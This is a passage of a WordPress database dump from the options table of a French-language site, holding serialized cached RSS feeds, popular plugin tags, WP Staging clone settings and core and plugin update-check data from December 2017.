alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wpformation.com/partager-brouillons-articles-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:52:\"http://backend.userland.com/creativeCommonsRssModule\";a:1:{s:7:\"license\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://creativecommons.org/licenses/by-nc-sa/3.0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:32:\"http://feeds.feedburner.com/wpfr\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:4:\"wpfr\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:11:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"mUiP8sitQoabC7HnyvQjzfjW5r4\";s:13:\"last-modified\";s:29:\"Fri, 08 Dec 2017 07:35:53 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Fri, 08 Dec 2017 07:42:42 GMT\";s:7:\"expires\";s:29:\"Fri, 08 Dec 2017 07:42:42 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";s:7:\"alt-svc\";s:140:\"hq=\":443\"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=\":443\"; ma=2592000; v=\"41,39,38,37,35\"\";}}s:5:\"build\";s:14:\"20130911020210\";}','no'),(2473,'_transient_timeout_feed_mod_76f8d9281c01f21e505004d0986f50c6','1512762162','no'),(2474,'_transient_feed_mod_76f8d9281c01f21e505004d0986f50c6','1512718962','no'),(2475,'_transient_timeout_dash_v2_bd94b8f41e74bae2f4dc72e9bd8379af','1512762162','no'),(2476,'_transient_dash_v2_bd94b8f41e74bae2f4dc72e9bd8379af','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/WordpressFrancophone/~3/g8Lqzfsj1e0/\'>Annonce de la prochaine Assemblée Générale du 12/12</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/wpfr/~3/eTpoqvkpD9o/\'>Comment créer un Espace de Membres avec votre WordPress ?</a></li><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/wpfr/~3/f6qqh4RrMWY/\'>L’extension « Press This » de WordPress</a></li><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/wpfr/~3/O1Lt2NL6wRs/\'>WordPress en 2018 et la révolution Gutenberg</a></li></ul></div>','no'),(2477,'_transient_timeout_select2-css_style_cdn_is_up','1512805571','no'),(2478,'_transient_select2-css_style_cdn_is_up','1','no'),(2479,'_transient_timeout_select2-js_script_cdn_is_up','1512805571','no'),(2480,'_transient_select2-js_script_cdn_is_up','1','no'),(2481,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1512732089','no'),(2482,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','O:8:\"stdClass\":100:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";i:4407;}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";i:2519;}s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";i:2457;}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";i:2380;}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";i:1846;}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";i:1616;}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";i:1610;}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";i:1439;}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";i:1367;}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";i:1367;}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";i:1352;}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";i:1283;}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";i:1280;}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";i:1161;}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";i:1071;}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";i:1055;}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";i:1004;}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";i:968;}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";i:841;}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";i:837;}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";i:817;}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";i:783;}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";i:775;}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";i:681;}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";i:675;}s:8:\"security\";a:3:{s:4:\"name\";s:8:\"security\";s:4:\"slug\";s:8:\"security\";s:5:\"count\";i:670;}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";i:670;}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";i:662;}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";i:650;}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";i:640;}s:6:\"slider\";a:3:{s:4:\"name\";s:6:\"slider\";s:4:\"slug\";s:6:\"slider\";s:5:\"count\";i:638;}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";i:618;}s:9:\"analytics\";a:3:{s:4:\"name\";s:9:\"analytics\";s:4:\"slug\";s:9:\"analytics\";s:5:\"count\";i:618;}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";i:600;}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"ajax\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";i:592;}s:10:\"e-commerce\";a:3:{s:4:\"name\";s:10:\"e-commerce\";s:4:\"slug\";s:10:\"e-commerce\";s:5:\"count\";i:590;}s:6:\"search\";a:3:{s:4:\"name\";s:6:\"search\";s:4:\"slug\";s:6:\"search\";s:5:\"count\";i:590;}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";i:583;}s:4:\"menu\";a:3:{s:4:\"name\";s:4:\"menu\";s:4:\"slug\";s:4:\"menu\";s:5:\"count\";i:572;}s:4:\"form\";a:3:{s:4:\"name\";s:4:\"form\";s:4:\"slug\";s:4:\"form\";s:5:\"count\";i:570;}s:5:\"embed\";a:3:{s:4:\"name\";s:5:\"embed\";s:4:\"slug\";s:5:\"embed\";s:5:\"count\";i:550;}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";i:541;}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";i:529;}s:3:\"css\";a:3:{s:4:\"name\";s:3:\"css\";s:4:\"slug\";s:3:\"css\";s:5:\"count\";i:526;}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";i:513;}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";i:504;}s:7:\"comment\";a:3:{s:4:\"name\";s:7:\"comment\";s:4:\"slug\";s:7:\"comment\";s:5:\"count\";i:504;}s:5:\"theme\";a:3:{s:4:\"name\";s:5:\"theme\";s:4:\"slug\";s:5:\"theme\";s:5:\"count\";i:495;}s:10:\"responsive\";a:3:{s:4:\"name\";s:10:\"responsive\";s:4:\"slug\";s:10:\"responsive\";s:5:\"count\";i:485;}s:9:\"dashboard\";a:3:{s:4:\"name\";s:9:\"dashboard\";s:4:\"slug\";s:9:\"dashboard\";s:5:\"count\";i:481;}s:6:\"custom\";a:3:{s:4:\"name\";s:6:\"custom\";s:4:\"slug\";s:6:\"custom\";s:5:\"count\";i:480;}s:10:\"categories\";a:3:{s:4:\"name\";s:10:\"categories\";s:4:\"slug\";s:10:\"categories\";s:5:\"count\";i:474;}s:6:\"editor\";a:3:{s:4:\"name\";s:6:\"editor\";s:4:\"slug\";s:6:\"editor\";s:5:\"count\";i:459;}s:3:\"ads\";a:3:{s:4:\"name\";s:3:\"ads\";s:4:\"slug\";s:3:\"ads\";s:5:\"count\";i:457;}s:9:\"affiliate\";a:3:{s:4:\"name\";s:9:\"affiliate\";s:4:\"slug\";s:9:\"affiliate\";s:5:\"count\";i:456;}s:6:\"button\";a:3:{s:4:\"name\";s:6:\"button\";s:4:\"slug\";s:6:\"button\";s:5:\"count\";i:452;}s:12:\"contact-form\";a:3:{s:4:\"name\";s:12:\"contact form\";s:4:\"slug\";s:12:\"contact-form\";s:5:\"count\";i:449;}s:4:\"tags\";a:3:{s:4:\"name\";s:4:\"tags\";s:4:\"slug\";s:4:\"tags\";s:5:\"count\";i:446;}s:4:\"user\";a:3:{s:4:\"name\";s:4:\"user\";s:4:\"slug\";s:4:\"user\";s:5:\"count\";i:429;}s:7:\"contact\";a:3:{s:4:\"name\";s:7:\"contact\";s:4:\"slug\";s:7:\"contact\";s:5:\"count\";i:416;}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";i:416;}s:6:\"mobile\";a:3:{s:4:\"name\";s:6:\"mobile\";s:4:\"slug\";s:6:\"mobile\";s:5:\"count\";i:415;}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";i:410;}s:5:\"users\";a:3:{s:4:\"name\";s:5:\"users\";s:4:\"slug\";s:5:\"users\";s:5:\"count\";i:410;}s:9:\"slideshow\";a:3:{s:4:\"name\";s:9:\"slideshow\";s:4:\"slug\";s:9:\"slideshow\";s:5:\"count\";i:407;}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";i:401;}s:3:\"api\";a:3:{s:4:\"name\";s:3:\"api\";s:4:\"slug\";s:3:\"api\";s:5:\"count\";i:398;}s:6:\"events\";a:3:{s:4:\"name\";s:6:\"events\";s:4:\"slug\";s:6:\"events\";s:5:\"count\";i:389;}s:10:\"statistics\";a:3:{s:4:\"name\";s:10:\"statistics\";s:4:\"slug\";s:10:\"statistics\";s:5:\"count\";i:385;}s:10:\"navigation\";a:3:{s:4:\"name\";s:10:\"navigation\";s:4:\"slug\";s:10:\"navigation\";s:5:\"count\";i:378;}s:4:\"news\";a:3:{s:4:\"name\";s:4:\"news\";s:4:\"slug\";s:4:\"news\";s:5:\"count\";i:358;}s:7:\"payment\";a:3:{s:4:\"name\";s:7:\"payment\";s:4:\"slug\";s:7:\"payment\";s:5:\"count\";i:351;}s:8:\"calendar\";a:3:{s:4:\"name\";s:8:\"calendar\";s:4:\"slug\";s:8:\"calendar\";s:5:\"count\";i:350;}s:10:\"shortcodes\";a:3:{s:4:\"name\";s:10:\"shortcodes\";s:4:\"slug\";s:10:\"shortcodes\";s:5:\"count\";i:345;}s:12:\"social-media\";a:3:{s:4:\"name\";s:12:\"social media\";s:4:\"slug\";s:12:\"social-media\";s:5:\"count\";i:337;}s:5:\"popup\";a:3:{s:4:\"name\";s:5:\"popup\";s:4:\"slug\";s:5:\"popup\";s:5:\"count\";i:337;}s:9:\"multisite\";a:3:{s:4:\"name\";s:9:\"multisite\";s:4:\"slug\";s:9:\"multisite\";s:5:\"count\";i:336;}s:7:\"plugins\";a:3:{s:4:\"name\";s:7:\"plugins\";s:4:\"slug\";s:7:\"plugins\";s:5:\"count\";i:332;}s:4:\"code\";a:3:{s:4:\"name\";s:4:\"code\";s:4:\"slug\";s:4:\"code\";s:5:\"count\";i:331;}s:10:\"newsletter\";a:3:{s:4:\"name\";s:10:\"newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:5:\"count\";i:330;}s:4:\"list\";a:3:{s:4:\"name\";s:4:\"list\";s:4:\"slug\";s:4:\"list\";s:5:\"count\";i:328;}s:4:\"meta\";a:3:{s:4:\"name\";s:4:\"meta\";s:4:\"slug\";s:4:\"meta\";s:5:\"count\";i:325;}s:3:\"url\";a:3:{s:4:\"name\";s:3:\"url\";s:4:\"slug\";s:3:\"url\";s:5:\"count\";i:324;}s:9:\"marketing\";a:3:{s:4:\"name\";s:9:\"marketing\";s:4:\"slug\";s:9:\"marketing\";s:5:\"count\";i:321;}s:4:\"chat\";a:3:{s:4:\"name\";s:4:\"chat\";s:4:\"slug\";s:4:\"chat\";s:5:\"count\";i:316;}s:8:\"redirect\";a:3:{s:4:\"name\";s:8:\"redirect\";s:4:\"slug\";s:8:\"redirect\";s:5:\"count\";i:307;}s:15:\"payment-gateway\";a:3:{s:4:\"name\";s:15:\"payment gateway\";s:4:\"slug\";s:15:\"payment-gateway\";s:5:\"count\";i:304;}s:6:\"simple\";a:3:{s:4:\"name\";s:6:\"simple\";s:4:\"slug\";s:6:\"simple\";s:5:\"count\";i:300;}s:3:\"tag\";a:3:{s:4:\"name\";s:3:\"tag\";s:4:\"slug\";s:3:\"tag\";s:5:\"count\";i:299;}s:5:\"forms\";a:3:{s:4:\"name\";s:5:\"forms\";s:4:\"slug\";s:5:\"forms\";s:5:\"count\";i:298;}s:16:\"custom-post-type\";a:3:{s:4:\"name\";s:16:\"custom post type\";s:4:\"slug\";s:16:\"custom-post-type\";s:5:\"count\";i:297;}s:11:\"advertising\";a:3:{s:4:\"name\";s:11:\"advertising\";s:4:\"slug\";s:11:\"advertising\";s:5:\"count\";i:291;}s:4:\"html\";a:3:{s:4:\"name\";s:4:\"html\";s:4:\"slug\";s:4:\"html\";s:5:\"count\";i:288;}s:7:\"adsense\";a:3:{s:4:\"name\";s:7:\"adsense\";s:4:\"slug\";s:7:\"adsense\";s:5:\"count\";i:287;}s:6:\"author\";a:3:{s:4:\"name\";s:6:\"author\";s:4:\"slug\";s:6:\"author\";s:5:\"count\";i:286;}s:8:\"tracking\";a:3:{s:4:\"name\";s:8:\"tracking\";s:4:\"slug\";s:8:\"tracking\";s:5:\"count\";i:283;}s:8:\"lightbox\";a:3:{s:4:\"name\";s:8:\"lightbox\";s:4:\"slug\";s:8:\"lightbox\";s:5:\"count\";i:281;}s:7:\"tinymce\";a:3:{s:4:\"name\";s:7:\"tinyMCE\";s:4:\"slug\";s:7:\"tinymce\";s:5:\"count\";i:278;}s:16:\"google-analytics\";a:3:{s:4:\"name\";s:16:\"google analytics\";s:4:\"slug\";s:16:\"google-analytics\";s:5:\"count\";i:278;}s:12:\"notification\";a:3:{s:4:\"name\";s:12:\"notification\";s:4:\"slug\";s:12:\"notification\";s:5:\"count\";i:277;}}','no'),(2487,'wpstg_installDate','2017-12-08 08:44:45','yes'),(2488,'wpstg_existing_clones_beta','a:1:{i:1512723081474;a:7:{s:13:\"directoryName\";s:13:\"1512723081474\";s:4:\"path\";s:62:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/1512723081474\";s:3:\"url\";s:52:\"https://guineeinnove.nimbasolution.com/1512723081474\";s:6:\"number\";i:1;s:7:\"version\";s:5:\"2.1.5\";s:6:\"status\";b:0;s:6:\"prefix\";s:7:\"wpstg0_\";}}','yes'),(2489,'wpstg_version','2.1.5','yes'),(2490,'wpstg_version_upgraded_from','','yes'),(2491,'wpstg_settings','a:4:{s:10:\"queryLimit\";s:4:\"1000\";s:9:\"fileLimit\";s:1:\"1\";s:9:\"batchSize\";s:1:\"2\";s:7:\"cpuLoad\";s:6:\"medium\";}','yes'),(2493,'_site_transient_timeout_theme_roots','1512727720','no'),(2494,'_site_transient_theme_roots','a:4:{s:6:\"magzma\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}','no'),(2495,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:3:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/fr_FR/wordpress-4.9.1.zip\";s:6:\"locale\";s:5:\"fr_FR\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/fr_FR/wordpress-4.9.1.zip\";s:10:\"no_content\";b:0;s:11:\"new_bundled\";b:0;s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.1\";s:7:\"version\";s:5:\"4.9.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.1\";s:7:\"version\";s:5:\"4.9.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.1\";s:7:\"version\";s:5:\"4.9.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1512725926;s:15:\"version_checked\";s:5:\"4.8.4\";s:12:\"translations\";a:0:{}}','no'),(2496,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1512725928;s:7:\"checked\";a:13:{s:19:\"akismet/akismet.php\";s:5:\"3.3.4\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"4.9.1\";s:25:\"duplicator/duplicator.php\";s:6:\"1.2.30\";s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";s:5:\"4.3.3\";s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";s:3:\"0.8\";s:23:\"elementor/elementor.php\";s:5:\"1.8.0\";s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";s:3:\"2.9\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:5:\"6.2.4\";s:9:\"hello.php\";s:3:\"1.6\";s:26:\"popup-by-supsystic/pps.php\";s:6:\"1.9.11\";s:35:\"redux-framework/redux-framework.php\";s:7:\"3.6.7.7\";s:27:\"trackserver/trackserver.php\";s:5:\"3.0.1\";s:24:\"wordpress-seo/wp-seo.php\";s:5:\"5.7.1\";}s:8:\"response\";a:6:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.0.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.0.1.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:7:\"default\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";s:7:\"default\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:35:\"w.org/plugins/easy-facebook-likebox\";s:4:\"slug\";s:21:\"easy-facebook-likebox\";s:6:\"plugin\";s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";s:11:\"new_version\";s:5:\"4.3.4\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/easy-facebook-likebox/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/easy-facebook-likebox.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:74:\"https://ps.w.org/easy-facebook-likebox/assets/icon-128x128.png?rev=1195342\";s:7:\"default\";s:74:\"https://ps.w.org/easy-facebook-likebox/assets/icon-128x128.png?rev=1195342\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:76:\"https://ps.w.org/easy-facebook-likebox/assets/banner-772x250.jpg?rev=1192818\";s:7:\"default\";s:76:\"https://ps.w.org/easy-facebook-likebox/assets/banner-772x250.jpg?rev=1192818\";}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:71:\"<p>Fixed FB not defined issue.\nTested upto WordPress 4.9.1 version.</p>\";s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"1.8.9\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.1.8.9.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.png?rev=1427768\";s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:7:\"default\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";s:7:\"default\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:44:\"w.org/plugins/google-analytics-for-wordpress\";s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:6:\"plugin\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:11:\"new_version\";s:5:\"6.2.6\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/google-analytics-for-wordpress/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/google-analytics-for-wordpress.6.2.6.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:83:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon-128x128.png?rev=1598927\";s:2:\"2x\";s:83:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon-256x256.png?rev=1598927\";s:3:\"svg\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=1598927\";s:7:\"default\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=1598927\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=1598927\";s:2:\"1x\";s:85:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-772x250.png?rev=1598927\";s:7:\"default\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=1598927\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.0\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:26:\"popup-by-supsystic/pps.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:32:\"w.org/plugins/popup-by-supsystic\";s:4:\"slug\";s:18:\"popup-by-supsystic\";s:6:\"plugin\";s:26:\"popup-by-supsystic/pps.php\";s:11:\"new_version\";s:6:\"1.9.14\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/popup-by-supsystic/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/popup-by-supsystic.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:71:\"https://ps.w.org/popup-by-supsystic/assets/icon-128x128.png?rev=1684295\";s:2:\"2x\";s:71:\"https://ps.w.org/popup-by-supsystic/assets/icon-256x256.png?rev=1684296\";s:7:\"default\";s:71:\"https://ps.w.org/popup-by-supsystic/assets/icon-256x256.png?rev=1684296\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:74:\"https://ps.w.org/popup-by-supsystic/assets/banner-1544x500.png?rev=1684294\";s:2:\